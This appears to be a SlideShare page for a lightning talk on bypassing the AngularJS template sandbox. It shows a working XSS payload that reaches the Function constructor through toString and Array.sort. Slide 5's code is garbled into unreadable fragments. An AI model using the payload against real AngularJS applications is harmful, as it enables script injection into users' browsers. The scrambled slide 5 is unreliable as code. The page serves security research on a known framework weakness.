Breaking AngularJS Javascript sandbox
2 likes2,181 views
The document is a lightning talk by Avlidienbrunn on AngularJS, highlighting its use as a JavaScript framework for single-page applications. It discusses template expressions and their sandboxing capabilities to prevent security risks, such as XSS attacks, by restricting access to certain JavaScript functionalities. The talk also briefly touches on evasion techniques related to JavaScript execution in AngularJS environments.
![What is AngularJS? And
where’s the sandbox?
• Javascript framework for building single page web
applications.
• Mustache style templates: Having <h1>{{1+2+3}}</h1>
anywhere in Angular HTML app will render <h1>6</h1>
• Template expressions are evaluated with Javascript
• Template expression Javascript is sandboxed - It can’t
reach [object Window] or DOM
• If we could access dangerous objects from templates, we
could XSS any AngularJS app that prints user data in
Angular bound HTML](https://image.slidesharecdn.com/angularjs-140919054944-phpapp01/85/Breaking-AngularJS-Javascript-sandbox-2-320.jpg)
![The bypass
toString.constructor.prototype.toString=
toString.constructor.prototype.call;
[“a”,"alert(1)"].sort(toString.constructor)
alert(1)](https://image.slidesharecdn.com/angularjs-140919054944-phpapp01/85/Breaking-AngularJS-Javascript-sandbox-4-320.jpg)
![The how
if(if((toString.Function("compareFunction(function(constructor.a){a", alert("alert(1)}) 1)}).element1, 1)") prototype.== toString() == 1){
1){
element2) toString=
== 1..toString()){
== 1){
toString.//{{sort toString.element constructor.constructor.as bigger
prototype.prototype.call;
toString=
}else if((function(["if(… a","toString.alert(== a){0){
1)"].alert(constructor.sort(1)}).Function);
call() prototype.== 1..toString()){
call;
//sort element as same
}else{
//sort element as smaller
}
//sort element as bigger
}else if(… == 0){
//sort element as same
}else{
//sort element as smaller
}
toString.constructor);
[“a”,”alert(1)”].sort(toString.constructor)}}
alert(1)](https://image.slidesharecdn.com/angularjs-140919054944-phpapp01/85/Breaking-AngularJS-Javascript-sandbox-5-320.jpg)
Breaking AngularJS Javascript sandbox
- 1. Breaking ngularJS Javascript sandbox A lightning talk by avlidienbrunn
- 2. What is AngularJS? And where’s the sandbox? • Javascript framework for building single page web applications. • Mustache style templates: Having <h1>{{1+2+3}}</h1> anywhere in Angular HTML app will render <h1>6</h1> • Template expressions are evaluated with Javascript • Template expression Javascript is sandboxed - It can’t reach [object Window] or DOM • If we could access dangerous objects from templates, we could XSS any AngularJS app that prints user data in Angular bound HTML
- 3. Executing JS… From JS • eval() - Unavailable under window • document.write - Unavailable under document • location=“javascript:” - Unavailable under document • Function(“code”)() - Unavailable under blacklist • What else is there?
- 4. The bypass toString.constructor.prototype.toString= toString.constructor.prototype.call; [“a”,"alert(1)"].sort(toString.constructor) alert(1)
- 5. The how if(if((toString.Function("compareFunction(function(constructor.a){a", alert("alert(1)}) 1)}).element1, 1)") prototype.== toString() == 1){ 1){ element2) toString= == 1..toString()){ == 1){ toString.//{{sort toString.element constructor.constructor.as bigger prototype.prototype.call; toString= }else if((function(["if(… a","toString.alert(== a){0){ 1)"].alert(constructor.sort(1)}).Function); call() prototype.== 1..toString()){ call; //sort element as same }else{ //sort element as smaller } //sort element as bigger }else if(… == 0){ //sort element as same }else{ //sort element as smaller } toString.constructor); [“a”,”alert(1)”].sort(toString.constructor)}} alert(1)
- 6. That’s all folks! + = A lightning talk by avlidienbrunn